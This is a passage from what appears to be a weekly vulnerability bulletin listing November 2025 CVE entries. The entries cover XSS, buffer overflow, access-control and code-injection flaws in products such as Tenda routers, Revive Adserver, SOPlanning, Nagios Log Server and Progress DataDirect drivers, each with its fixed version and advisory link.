| n/a--Sencore SMP100 SMP Media Platform (firmware versions V4.2.160, V60.1.4, V60.1.29) | The Sencore SMP100 SMP Media Platform (firmware versions V4.2.160, V60.1.4, V60.1.29) is vulnerable to session hijacking due to improper session management on the /UserManagement.html endpoint. Attackers who are on the same network as the victim and have access to the target's logged-in session can access the endpoint and add new users without any authentication. This allows attackers to gain unauthorized access to the system and perform malicious activities. | 2025-11-18 | not yet calculated | CVE-2025-63226 | https://www.sencore.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63226_Sencore_SMP100_Session_Hijacking   |
| n/a--Snipe-IT v8.3.4 | Snipe-IT v8.3.4 (build 20218) contains a reflected cross-site scripting (XSS) vulnerability in the CSV Import workflow. When an invalid CSV file is uploaded, the application returns a progress_message value that is rendered as raw HTML in the admin interface. An attacker can intercept and modify the POST /livewire/update request to inject arbitrary HTML or JavaScript into the progress_message. Because the server accepts the modified input without sanitization and reflects it back to the user, arbitrary JavaScript executes in the browser of any authenticated admin who views the import page. | 2025-11-20 | not yet calculated | CVE-2025-64027 | https://github.com/grokability/snipe-it https://github.com/cybercrewinc/CVE-2025-64027/   |
| n/a--Sound4 FIRST | The Sound4 FIRST web-based management interface is vulnerable to Remote Code Execution (RCE) via a malicious firmware update package. The update mechanism fails to validate the integrity of manual.sh, allowing an attacker to inject arbitrary commands by modifying this script and repackaging the firmware. | 2025-11-19 | not yet calculated | CVE-2025-63220 | https://www.sound4helpdesk.com/ https://www.sound4helpdesk.com/first-downloads/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63220_Sound4%20FIRST%20RCE   |
| n/a--Sound4 IMPACT | The Sound4 IMPACT web-based management interface is vulnerable to Remote Code Execution (RCE) via a malicious firmware update package. The update mechanism fails to validate the integrity of manual.sh, allowing an attacker to inject arbitrary commands by modifying this script and repackaging the firmware. | 2025-11-18 | not yet calculated | CVE-2025-63215 | https://www.sound4helpdesk.com/ https://www.sound4helpdesk.com/impact-downloads/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63215%20_%20Sound4%20IMPACT%20%20RCE   |
| n/a--SourceCodester AI Font Matcher (nid=18425, 2025-10-10) | Cross-Site Scripting (XSS) vulnerability exists in SourceCodester AI Font Matcher (nid=18425, 2025-10-10) that allows remote attackers to execute arbitrary JavaScript in victims' browsers. The vulnerability occurs in the webfonts API handling mechanism where font family names are not properly sanitized. An attacker can intercept fetch requests to the webfonts endpoint and inject malicious JavaScript payloads through font family names, resulting in session cookie theft, account hijacking, and unauthorized actions performed on behalf of authenticated users. The vulnerability can be exploited by injecting a fetch hook that returns controlled font data containing malicious scripts. | 2025-11-17 | not yet calculated | CVE-2025-63708 | https://www.sourcecodester.com/javascript/18425/ai-font-matcher-using-html-css-and-javascript-source-code.html https://github.com/DylanDavis1/CVE-2025-64708   |
| n/a--SourceCodester Student Grades Management System 1.0 | A vulnerability was determined in SourceCodester Student Grades Management System 1.0. Affected is the function create_classroom of the file /classroom.php of the component My Classrooms Management Page. This manipulation of the argument name/description causes stored cross site scripting. | 2025-11-18 | not yet calculated | CVE-2025-63892 | http://student.com http://sourcecodester.com https://github.com/minhajultaivin/security-advisories/blob/main/CVE-2025-63892.md   |
| n/a--SWISH prolog thru 2.2.0 | Stored cross site scripting (xss) vulnerability in SWISH prolog thru 2.2.0 allowing attackers to execute arbitrary code via crafted web IDE notebook. | 2025-11-20 | not yet calculated | CVE-2025-63848 | https://github.com/SWI-Prolog https://github.com/coderMohammed1/CVE-2025-63848   |
| n/a--Tenda AC21 V16.03.08.16 | Tenda AC21 V16.03.08.16 is vulnerable to Buffer Overflow in: /goform/SetVirtualServerCfg via the list parameter. | 2025-11-20 | not yet calculated | CVE-2025-65220 | https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN1.md   |
| n/a--Tenda AC21 V16.03.08.16 | Tenda AC21 V16.03.08.16 is vulnerable to Buffer Overflow via the list parameter of /goform/setPptpUserList. | 2025-11-20 | not yet calculated | CVE-2025-65221 | https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN2.md   |
| n/a--Tenda AC21 V16.03.08.16 | Tenda AC21 V16.03.08.16 is vulnerable to Buffer Overflow via the rebootTime parameter of /goform/SetSysAutoRebbotCfg. | 2025-11-20 | not yet calculated | CVE-2025-65222 | https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN3.md   |
| n/a--Tenda AC21 V16.03.08.16 | Tenda AC21 V16.03.08.16 is vulnerable to Buffer Overflow via the urls parameter of /goform/saveParentControlInfo. | 2025-11-20 | not yet calculated | CVE-2025-65223 | https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN4.md   |
| n/a--Tenda AC21 V16.03.08.16 | Tenda AC21 V16.03.08.16 is vulnerable to Buffer Overflow via the deviceId parameter in /goform/saveParentControlInfo. | 2025-11-20 | not yet calculated | CVE-2025-65226 | https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN5.md   |
| n/a--ThinkPHP 5.0.24 | The read function in file thinkphp\library\think\template\driver\File.php in ThinkPHP 5.0.24 contains a remote code execution vulnerability. | 2025-11-20 | not yet calculated | CVE-2025-63888 | https://www.yuque.com/lcc316/df0kgm/mglhbxltgbmzfh2s https://gist.github.com/Master-0-0/0bf54cbb335b586b42b0db0db804e7aa   |
| n/a--ThinkPHP 5.0.24 | The fetch function in file thinkphp\library\think\Template.php in ThinkPHP 5.0.24 allows attackers to read arbitrary files via crafted file path in a template value. | 2025-11-20 | not yet calculated | CVE-2025-63889 | https://www.yuque.com/lcc316/df0kgm/xqkrw5rfz5vqxo9t https://gist.github.com/Master-0-0/dd63209602f04267f1a27a75a064df26   |
| n/a--weijiang1994 university-bbs | An issue was discovered in weijiang1994 university-bbs (aka Blogin) in commit 9e06bab430bfc729f27b4284ba7570db3b11ce84 (2025-01-13). A weak verification code generation mechanism combined with missing rate limiting allows attackers to perform brute-force attacks on verification codes without authentication. Successful exploitation may result in account takeover via password reset or other authentication bypass methods. | 2025-11-20 | not yet calculated | CVE-2025-63807 | https://gist.github.com/Rycarl-Furry/3e93c6f0d48a29518adf341e0fc7e2dd   |
| Nagios--Log Server | Nagios Log Server versions prior to 2026R1.0.1 contain an authenticated command injection vulnerability via the experimental 'Natural Language Queries' feature. Configuration values for this feature are read from the application settings and incorporated into a system command without adequate validation or restriction of special characters. An authenticated user with access to global configuration can abuse these settings to execute arbitrary operating system commands with the privileges of the web server account, leading to compromise of the Log Server host. | 2025-11-17 | not yet calculated | CVE-2025-34322 | https://www.nagios.com/products/security/#log-server https://www.nagios.com/changelog/nagios-log-server/nagios-log-server-2026r1-0-1/ https://www.vulncheck.com/advisories/nagios-log-server-authenticated-command-injection-via-natural-language-queries   |
| Nagios--Log Server | Nagios Log Server versions prior to 2026R1.0.1 are vulnerable to local privilege escalation due to unsafe interaction between sudo rules and file system permissions. The web server account is granted passwordless sudo access to certain maintenance scripts while also being a member of a group that has write access to the directory containing those scripts. A local attacker running as the web server user can replace one of the permitted scripts with a malicious program and then execute it via sudo, resulting in arbitrary code execution with root privileges. | 2025-11-17 | not yet calculated | CVE-2025-34323 | https://www.nagios.com/products/security/#log-server https://www.nagios.com/changelog/nagios-log-server/nagios-log-server-2026r1-0-1/ https://www.vulncheck.com/advisories/nagios-log-server-local-privilege-escalation-via-writable-scripts-and-sudo-rules   |
| NEC Corporation--RakurakuMusen Start EX | DLL Loading vulnerability in NEC Corporation RakurakuMusen Start EX All Verisons allows a attacker to manipulate the PC environment to cause unintended operations on the user's device. | 2025-11-19 | not yet calculated | CVE-2025-12852 | https://jpn.nec.com/security-info/secinfo/nv25-007_en.html   |
| Nelio Software--Nelio Popups | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nelio Software Nelio Popups nelio-popups allows Stored XSS.This issue affects Nelio Popups: from n/a through <= 1.3.0. | 2025-11-21 | not yet calculated | CVE-2025-66111 | https://vdp.patchstack.com/database/Wordpress/Plugin/nelio-popups/vulnerability/wordpress-nelio-popups-plugin-1-3-0-cross-site-scripting-xss-vulnerability?_s_id=cve   |
| octolize--Cart Weight for WooCommerce | Missing Authorization vulnerability in octolize Cart Weight for WooCommerce woo-cart-weight allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Cart Weight for WooCommerce: from n/a through <= 1.9.11. | 2025-11-21 | not yet calculated | CVE-2025-66109 | https://vdp.patchstack.com/database/Wordpress/Plugin/woo-cart-weight/vulnerability/wordpress-cart-weight-for-woocommerce-plugin-1-9-11-broken-access-control-vulnerability?_s_id=cve   |
| openfga--openfga | OpenFGA is a high-performance and flexible authorization/permission engine built for developers and inspired by Google Zanzibar. OpenFGA v1.4.0 to v1.11.0 ( openfga-0.1.34 <= Helm chart <= openfga-0.2.48, v.1.4.0 <= docker <= v.1.11.0) are vulnerable to improper policy enforcement when certain Check and ListObject calls are executed. This issue has been patched in version 1.11.1. | 2025-11-21 | not yet calculated | CVE-2025-64751 | https://github.com/openfga/openfga/security/advisories/GHSA-2c64-vmv2-hgfc https://github.com/openfga/openfga/releases/tag/v1.11.1   |
| OpenText--uCMDB | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in opentext uCMDB allows Stored XSS. The vulnerability could allow an attacker has high level access to UCMDB to create or update data with malicious scripts This issue affects uCMDB: 24.4. | 2025-11-19 | not yet calculated | CVE-2025-11884 | https://portal.microfocus.com/s/article/KM000043674?language=en_US   |
| OSC--ondemand | Open OnDemand is an open-source HPC portal. Prior to versions 4.0.8 and 3.1.16, Open OnDemand packages create world writable locations in the GEM_PATH. Open OnDemand versions 4.0.8 and 3.1.16 have been patched for this vulnerability. | 2025-11-20 | not yet calculated | CVE-2025-64185 | https://github.com/OSC/ondemand/security/advisories/GHSA-r2cg-hg78-gq9p   |
| pjsip--pjproject | PJSIP is a free and open source multimedia communication library. Prior to version 2.16, Opus PLC may zero-fill the input frame as long as the decoder ptime, while the input frame length, which is based on stream ptime, may be less than that. This issue affects PJSIP users who use the Opus audio codec in receiving direction. The vulnerability can lead to unexpected application termination due to a memory overwrite. This issue has been patched in version 2.16. | 2025-11-21 | not yet calculated | CVE-2025-65102 | https://github.com/pjsip/pjproject/security/advisories/GHSA-w5vr-39x7-h8g5 https://github.com/pjsip/pjproject/commit/6e9bd2e7d25bba26f852771b40693f45da14fa8f   |
| Progress--DataDirect Connect for JDBC for Amazon Redshift | Improper Control of Generation of Code ('Code Injection') vulnerability in Progress DataDirect Connect for JDBC drivers, Progress DataDirect Open Access JDBC driver and Hybrid Data Pipeline allows Remote Code Inclusion. The SpyAttribute connection option implemented by the DataDirect Connect for JDBC drivers, DataDirect Hybrid Data Pipeline JDBC driver and the DataDirect OpenAccess JDBC driver supports an undocumented syntax construct for the option value that if discovered can be used by an attacker. If an application allows an end user to specify a value for the SpyAttributes connection option then an attacker can use the undocumented syntax to cause the driver to load an arbitrary class on the class path and execute a constructor on that class.   This issue affects: DataDirect Connect for JDBC for Amazon Redshift: through 6.0.0.001392, fixed in 6.0.0.001541 DataDirect Connect for JDBC for Apache Cassandra: through 6.0.0.000805, fixed in 6.0.0.000833 DataDirect Connect for JDBC for Hive: through 6.0.1.001499, fixed in 6.0.1.001628 DataDirect Connect for JDBC for Apache Impala: through 6.0.0.001155, fixed in 6.0.0.001279 DataDirect Connect for JDBC for Apache SparkSQL: through 6.0.1.001222, fixed in 6.0.1.001344 DataDirect Connect for JDBC Autonomous REST Connector: through 6.0.1.006961, fixed in 6.0.1.007063 DataDirect Connect for JDBC for DB2: through 6.0.0.000717, fixed in 6.0.0.000964 DataDirect Connect for JDBC for Google Analytics 4: through 6.0.0.000454, fixed in 6.0.0.000525 DataDirect Connect for JDBC for Google BigQuery: through 6.0.0.002279, fixed in 6.0.0.002410 DataDirect Connect for JDBC for Greenplum: through 6.0.0.001712, fixed in 6.0.0.001727 DataDirect Connect for JDBC for Informix: through 6.0.0.000690, fixed in 6.0.0.0851 DataDirect Connect for JDBC for Microsoft Dynamics 365: through 6.0.0.003161, fixed in 6.0.0.3198 DataDirect Connect for JDBC for Microsoft SQLServer: through 6.0.0.001936, fixed in 6.0.0.001957 DataDirect Connect for JDBC for Microsoft Sharepoint: through 6.0.0.001559, fixed in 6.0.0.001587 DataDirect Connect for JDBC for MongoDB: through 6.1.0.001654, fixed in 6.1.0.001669 DataDirect Connect for JDBC for MySQL: through 5.1.4.000330, fixed in 5.1.4.000364 DataDirect Connect for JDBC for Oracle Database: through 6.0.0.001747, fixed in 6.0.0.001776 DataDirect Connect for JDBC for Oracle Eloqua: through 6.0.0.001438, fixed in 6.0.0.001458 DataDirect Connect for JDBC for Oracle Sales Cloud: through 6.0.0.001225, fixed in 6.0.0.001316 DataDirect Connect for JDBC for Oracle Service Cloud: through 5.1.4.000298, fixed in 5.1.4.000309 DataDirect Connect for JDBC for PostgreSQL: through 6.0.0.001843, fixed in 6.0.0.001856 DataDirect Connect for JDBC for Progress OpenEdge: through 5.1.4.000187, fixed in 5.1.4.000189 DataDirect Connect for JDBC for Salesforce: through 6.0.0.003020, fixed in 6.0.0.003125 DataDirect Connect for JDBC for SAP HANA: through 6.0.0.000879, product retired DataDirect Connect for JDBC for SAP S/4 HANA: through 6.0.1.001818, fixed in 6.0.1.001858 DataDirect Connect for JDBC for Sybase ASE: through 5.1.4.000161, fixed in 5.1.4.000162 DataDirect Connect for JDBC for Snowflake: through 6.0.1.001821, fixed in 6.0.1.001856 DataDirect Hybrid Data Pipeline Server: through 4.6.2.3309, fixed in 4.6.2.3430 DataDirect Hybrid Data Pipeline JDBC Driver: through 4.6.2.0607, fixed in 4.6.2.1023 DataDirect Hybrid Data Pipeline On Premises Connector: through 4.6.2.1223, fixed in 4.6.2.1339 DataDirect Hybrid Data Pipeline Docker: through 4.6.2.3316, fixed in 4.6.2.3430 DataDirect OpenAccess JDBC Driver: through 8.1.0.0177, fixed in 8.1.0.0183 DataDirect OpenAccess JDBC Driver: through 9.0.0.0019, fixed in 9.0.0.0022 | 2025-11-19 | not yet calculated | CVE-2025-10702 | https://community.progress.com/s/article/Progress-DataDirect-Critical-Security-Product-Alert-Bulletin-November-2025   |
| Progress--DataDirect Connect for JDBC for Amazon Redshift | Improper Control of Generation of Code ('Code Injection') vulnerability in Progress DataDirect Connect for JDBC drivers, Progress DataDirect Open Access JDBC driver and Hybrid Data Pipeline allows Remote Code Inclusion. The SpyAttribute connection option implemented by the DataDirect Connect for JDBC drivers, DataDirect Hybrid Data Pipeline JDBC driver and the DataDirect OpenAccess JDBC driver log=(file) construct allows the user to specify an arbitrary file for the JDBC driver to write its log information to.  If an application allows an end user to specify a value for the SpyAttributes connection option then an attacker could cause java script to be written to a log file.  If the log file was in the correct location with the correct extension, an application server could see that log file as a resource to be served.  The attacker could fetch the resource from the server causing the java script to be executed. This issue affects: DataDirect Connect for JDBC for Amazon Redshift: through 6.0.0.001392, fixed in 6.0.0.001541 DataDirect Connect for JDBC for Apache Cassandra: through 6.0.0.000805, fixed in 6.0.0.000833 DataDirect Connect for JDBC for Hive: through 6.0.1.001499, fixed in 6.0.1.001628 DataDirect Connect for JDBC for Apache Impala: through 6.0.0.001155, fixed in 6.0.0.001279 DataDirect Connect for JDBC for Apache SparkSQL: through 6.0.1.001222, fixed in 6.0.1.001344 DataDirect Connect for JDBC Autonomous REST Connector: through 6.0.1.006961, fixed in 6.0.1.007063 DataDirect Connect for JDBC for DB2: through 6.0.0.000717, fixed in 6.0.0.000964 DataDirect Connect for JDBC for Google Analytics 4: through 6.0.0.000454, fixed in 6.0.0.000525 DataDirect Connect for JDBC for Google BigQuery: through 6.0.0.002279, fixed in 6.0.0.002410 DataDirect Connect for JDBC for Greenplum: through 6.0.0.001712, fixed in 6.0.0.001727 DataDirect Connect for JDBC for Informix: through 6.0.0.000690, fixed in 6.0.0.0851 DataDirect Connect for JDBC for Microsoft Dynamics 365: through 6.0.0.003161, fixed in 6.0.0.3198 DataDirect Connect for JDBC for Microsoft SQLServer: through 6.0.0.001936, fixed in 6.0.0.001957 DataDirect Connect for JDBC for Microsoft Sharepoint: through 6.0.0.001559, fixed in 6.0.0.001587 DataDirect Connect for JDBC for MongoDB: through 6.1.0.001654, fixed in 6.1.0.001669 DataDirect Connect for JDBC for MySQL: through 5.1.4.000330, fixed in 5.1.4.000364 DataDirect Connect for JDBC for Oracle Database: through 6.0.0.001747, fixed in 6.0.0.001776 DataDirect Connect for JDBC for Oracle Eloqua: through 6.0.0.001438, fixed in 6.0.0.001458 DataDirect Connect for JDBC for Oracle Sales Cloud: through 6.0.0.001225, fixed in 6.0.0.001316 DataDirect Connect for JDBC for Oracle Service Cloud: through 5.1.4.000298, fixed in 5.1.4.000309 DataDirect Connect for JDBC for PostgreSQL: through 6.0.0.001843, fixed in 6.0.0.001856 DataDirect Connect for JDBC for Progress OpenEdge: through 5.1.4.000187, fixed in 5.1.4.000189 DataDirect Connect for JDBC for Salesforce: through 6.0.0.003020, fixed in 6.0.0.003125 DataDirect Connect for JDBC for SAP HANA: through 6.0.0.000879, product retired DataDirect Connect for JDBC for SAP S/4 HANA: through 6.0.1.001818, fixed in 6.0.1.001858 DataDirect Connect for JDBC for Sybase ASE: through 5.1.4.000161, fixed in 5.1.4.000162 DataDirect Connect for JDBC for Snowflake: through 6.0.1.001821, fixed in 6.0.1.001856 DataDirect Hybrid Data Pipeline Server: through 4.6.2.3309, fixed in 4.6.2.3430 DataDirect Hybrid Data Pipeline JDBC Driver: through 4.6.2.0607, fixed in 4.6.2.1023 DataDirect Hybrid Data Pipeline On Premises Connector: through 4.6.2.1223, fixed in 4.6.2.1339 DataDirect Hybrid Data Pipeline Docker: through 4.6.2.3316, fixed in 4.6.2.3430 DataDirect OpenAccess JDBC Driver: through 8.1.0.0177, fixed in 8.1.0.0183 DataDirect OpenAccess JDBC Driver: through 9.0.0.0019, fixed in 9.0.0.0022 | 2025-11-19 | not yet calculated | CVE-2025-10703 | https://community.progress.com/s/article/Progress-DataDirect-Critical-Security-Product-Alert-Bulletin-November-2025   |
| Property Hive--PropertyHive | Missing Authorization vulnerability in Property Hive PropertyHive propertyhive allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PropertyHive: from n/a through <= 2.1.12. | 2025-11-21 | not yet calculated | CVE-2025-66087 | https://vdp.patchstack.com/database/Wordpress/Plugin/propertyhive/vulnerability/wordpress-propertyhive-plugin-2-1-12-broken-access-control-vulnerability?_s_id=cve   |
| Revive--Revive Adserver | Authorization bypass in Revive Adserver 5.5.2 and 6.0.1 and earlier versions causes an logged in attacker to change other users' email address and potentialy take over their accounts using the forgot password functionality. | 2025-11-20 | not yet calculated | CVE-2025-48986 | https://hackerone.com/reports/3398283   |
| Revive--Revive Adserver | Improper Neutralization of Input in Revive Adserver 5.5.2 and 6.0.1 and earlier versions causes a potential reflected XSS attack. | 2025-11-20 | not yet calculated | CVE-2025-48987 | https://hackerone.com/reports/3399191   |
| Revive--Revive Adserver | Improper neutralisation of format characters in the settings of Revive Adserver 5.5.2 and 6.0.1 and earlier versions causes an administrator user to disable the admin user console due to a fatal PHP error. | 2025-11-20 | not yet calculated | CVE-2025-52666 | https://hackerone.com/reports/3399218   |
| Revive--Revive Adserver | Missing JSON Content-Type header in a script in Revive Adserver 6.0.1 and 5.5.2 and earlier versions causes a stored XSS attack to be possible for a logged in manager user. | 2025-11-20 | not yet calculated | CVE-2025-52667 | https://hackerone.com/reports/3399809   |
| Revive--Revive Adserver | Improper input neutralization in the stats-conversions.php script in Revive Adserver 5.5.2 and 6.0.1 and earlier versions causes potential information disclosure and session hijacking via a stored XSS attack. | 2025-11-20 | not yet calculated | CVE-2025-52668 | https://hackerone.com/reports/3400506   |
| Revive--Revive Adserver | Insecure design policies in the user management system of Revive Adserver 5.5.2 and 6.0.1 and earlier versions causes non-admin users to have access to the contact name and email address of other users on the system. | 2025-11-20 | not yet calculated | CVE-2025-52669 | https://hackerone.com/reports/3401464   |
| Revive--Revive Adserver | Missing authorization check in Revive Adserver 5.5.2 and 6.0.1 and earlier versions causes users on the system to delete banners owned by other accounts | 2025-11-20 | not yet calculated | CVE-2025-52670 | https://hackerone.com/reports/3401612   |
| Revive--Revive Adserver | Debug information disclosure in the SQL error message to in Revive Adserver 5.5.2 and 6.0.1 and earlier versions causes non-admin users to acquire information about the software, PHP and database versions currently in use. | 2025-11-20 | not yet calculated | CVE-2025-52671 | https://hackerone.com/reports/3403450   |
| Revive--Revive Adserver | Improper neutralization of input in Revive Adserver 5.5.2 and 6.0.1 and earlier versions causes manager accounts to be able to craft XSS attacks to their own advertiser users. | 2025-11-20 | not yet calculated | CVE-2025-55123 | https://hackerone.com/reports/3404968   |
| Revive--Revive Adserver | Improper neutralisation of input in Revive Adserver 6.0.0+ causes a reflected XSS attack in the banner-zone.php script. | 2025-11-20 | not yet calculated | CVE-2025-55124 | https://hackerone.com/reports/3403727   |
| Revive--Revive Adserver | HackerOne community member Dang Hung Vi (vidang04) has reported a stored XSS vulnerability involving the navigation box at the top of advertiser-related pages, with campaign names being the vector for the stored XSS | 2025-11-20 | not yet calculated | CVE-2025-55126 | https://hackerone.com/reports/3411750   |
| Revive--Revive Adserver | HackerOne community member Dao Hoang Anh (yoyomiski) has reported an improper neutralization of whitespace in the username when adding new users. A username with leading or trailing whitespace could be virtually indistinguishable from its legitimate counterpart when the username is displayed in the UI, potentially leading to confusion. | 2025-11-20 | not yet calculated | CVE-2025-55127 | https://hackerone.com/reports/3413764   |
| Revive--Revive Adserver | HackerOne community member Dao Hoang Anh (yoyomiski) has reported an uncontrolled resource consumption vulnerability in the "userlog-index.php". An attacker with access to the admin interface could request an arbitrarily large number of items per page, potentially leading to a denial of service | 2025-11-20 | not yet calculated | CVE-2025-55128 | https://hackerone.com/reports/3413890   |
| Sabuj Kundu--CBX Bookmark & Favorite | Missing Authorization vulnerability in Sabuj Kundu CBX Bookmark & Favorite cbxwpbookmark allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects CBX Bookmark & Favorite: from n/a through <= 2.0.1. | 2025-11-21 | not yet calculated | CVE-2025-66101 | https://vdp.patchstack.com/database/Wordpress/Plugin/cbxwpbookmark/vulnerability/wordpress-cbx-bookmark-favorite-plugin-2-0-1-broken-access-control-vulnerability?_s_id=cve   |
| Scott Paterson--Subscriptions & Memberships for PayPal | Missing Authorization vulnerability in Scott Paterson Subscriptions & Memberships for PayPal subscriptions-memberships-for-paypal allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Subscriptions & Memberships for PayPal: from n/a through <= 1.1.7. | 2025-11-21 | not yet calculated | CVE-2025-66107 | https://vdp.patchstack.com/database/Wordpress/Plugin/subscriptions-memberships-for-paypal/vulnerability/wordpress-subscriptions-memberships-for-paypal-plugin-1-1-7-broken-access-control-vulnerability?_s_id=cve   |
| Shahjahan Jewel--FluentCommunity | Missing Authorization vulnerability in Shahjahan Jewel FluentCommunity fluent-community allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects FluentCommunity: from n/a through <= 2.0.0. | 2025-11-21 | not yet calculated | CVE-2025-66084 | https://vdp.patchstack.com/database/Wordpress/Plugin/fluent-community/vulnerability/wordpress-fluentcommunity-plugin-2-0-0-broken-access-control-vulnerability?_s_id=cve   |
| Shelly--Pro 3EM | Out-of-bounds Read in Shelly Pro 3EM (before v1.4.4) allows Overread Buffers. | 2025-11-19 | not yet calculated | CVE-2025-12056 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-12056 https://www.cisa.gov/news-events/ics-advisories/icsa-25-322-03   |
| Shelly--Pro 4PM | Allocation of Resources Without Limits or Throttling vulnerability in Shelly Pro 4PM (before v1.6) allows Excessive Allocation via network. | 2025-11-19 | not yet calculated | CVE-2025-11243 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-11243 https://www.nozominetworks.com/blog/shelly-pro-4pm-vulnerabilities https://www.cisa.gov/news-events/ics-advisories/icsa-25-322-02   |
| silabs.com--RS9116W | In a Bluetooth device, using RS9116-WiseConnect SDK experiences a Denial of Service, if it receives malformed L2CAP packets, only hard reset will bring the device to normal operation | 2025-11-17 | not yet calculated | CVE-2025-4321 | https://community.silabs.com/068Vm00000YV9DL   |
| sonalsinha21--SKT Skill Bar | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in sonalsinha21 SKT Skill Bar skt-skill-bar allows DOM-Based XSS.This issue affects SKT Skill Bar: from n/a through <= 2.5. | 2025-11-21 | not yet calculated | CVE-2025-66090 | https://vdp.patchstack.com/database/Wordpress/Plugin/skt-skill-bar/vulnerability/wordpress-skt-skill-bar-plugin-2-5-cross-site-scripting-xss-vulnerability?_s_id=cve   |
| SonicWall--Email Security | Download of Code Without Integrity Check Vulnerability in the SonicWall Email Security appliance loads root filesystem images without verifying signatures, allowing attackers with VMDK or datastore access to modify system files and gain persistent arbitrary code execution. | 2025-11-20 | not yet calculated | CVE-2025-40604 | https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0018   |
| SonicWall--Email Security | A Path Traversal vulnerability has been identified in the Email Security appliance allows an attacker to manipulate file system paths by injecting crafted directory-traversal sequences (such as ../) and may access files and directories outside the intended restricted path. | 2025-11-20 | not yet calculated | CVE-2025-40605 | https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0018   |
| SonicWall--SonicOS | A Stack-based buffer overflow vulnerability in the SonicOS SSLVPN service allows a remote unauthenticated attacker to cause Denial of Service (DoS), which could cause an impacted firewall to crash. | 2025-11-20 | not yet calculated | CVE-2025-40601 | https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0016   |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Broken Access Control in /status endpoint. Due to lack of permission checks in Project Status functionality an authenticated attacker is able to add, edit and delete any status. This issue was fixed in version 1.55. | 2025-11-20 | not yet calculated | CVE-2025-62293 | https://cert.pl/en/posts/2025/11/CVE-2025-62293 https://www.soplanning.org/en/   |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Predictable Generation of Password Recovery Token. Due to weak mechanism of generating recovery tokens, a malicious attacker is able to brute-force all possible values and takeover any account in reasonable amount of time. This issue was fixed in version 1.55. | 2025-11-20 | not yet calculated | CVE-2025-62294 | https://cert.pl/en/posts/2025/11/CVE-2025-62293 https://www.soplanning.org/en/   |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Stored XSS in /groupe_form endpoint. Malicious attacker with medium privileges can inject arbitrary HTML and JS into website, which will be rendered/executed when opening editor. This issue was fixed in version 1.55. | 2025-11-20 | not yet calculated | CVE-2025-62295 | https://cert.pl/en/posts/2025/11/CVE-2025-62293 https://www.soplanning.org/en/   |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Stored XSS in /taches endpoint. Malicious attacker with medium privileges can inject arbitrary HTML and JS into website, which will be rendered/executed when opening editor. This issue was fixed in version 1.55. | 2025-11-20 | not yet calculated | CVE-2025-62296 | https://cert.pl/en/posts/2025/11/CVE-2025-62293 https://www.soplanning.org/en/   |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Stored XSS in /projets endpoint. Malicious attacker with medium privileges can inject arbitrary HTML and JS into website, which will be rendered/executed when opening edited page. This issue was fixed in version 1.55. | 2025-11-20 | not yet calculated | CVE-2025-62297 | https://cert.pl/en/posts/2025/11/CVE-2025-62293 https://www.soplanning.org/en/   |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Stored XSS in /status endpoint. Malicious attacker with an account can inject arbitrary HTML and JS into website, which will be rendered/executed when opening multiple pages. This issue was fixed in version 1.55. | 2025-11-20 | not yet calculated | CVE-2025-62729 | https://cert.pl/en/posts/2025/11/CVE-2025-62293 https://www.soplanning.org/en/   |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Privilege Escalation in user management tab. Users with user_manage_team role are allowed to modify permissions of users. However, they are able to assign administrative permissions to any user including themselves. This allow a malicious authenticated attacker with this role to escalate to admin privileges. This issue affects both Bulk Update functionality and regular edition of user's right and privileges. This issue was fixed in version 1.55. | 2025-11-20 | not yet calculated | CVE-2025-62730 | https://cert.pl/en/posts/2025/11/CVE-2025-62293 https://www.soplanning.org/en/   |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Stored XSS in /feries endpoint. Malicious attacker with access to public holidays feature is able to inject arbitrary HTML and JS into website, which will be rendered/executed when opening multiple pages. By default only administrators and users with special privileges are able to access this endpoint. This issue was fixed in version 1.55. | 2025-11-20 | not yet calculated | CVE-2025-62731 | https://cert.pl/en/posts/2025/11/CVE-2025-62293 https://www.soplanning.org/en/   |
| Stiofan--UsersWP | Missing Authorization vulnerability in Stiofan UsersWP userswp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects UsersWP: from n/a through <= 1.2.47. | 2025-11-21 | not yet calculated | CVE-2025-66072 | https://vdp.patchstack.com/database/Wordpress/Plugin/userswp/vulnerability/wordpress-userswp-plugin-1-2-47-broken-access-control-vulnerability?_s_id=cve   |
| SUSE--openSUSE Tumbleweed | An Improper Check for Unusual or Exceptional Conditions vulnerability in OpenSMTPD allows local users to crash OpenSMTPD. This issue affects openSUSE Tumbleweed: from ? before 7.8.0p0-1.1. | 2025-11-20 | not yet calculated | CVE-2025-62875 | https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-62875 https://security.opensuse.org/2025/10/31/opensmtpd-local-DoS.html   |
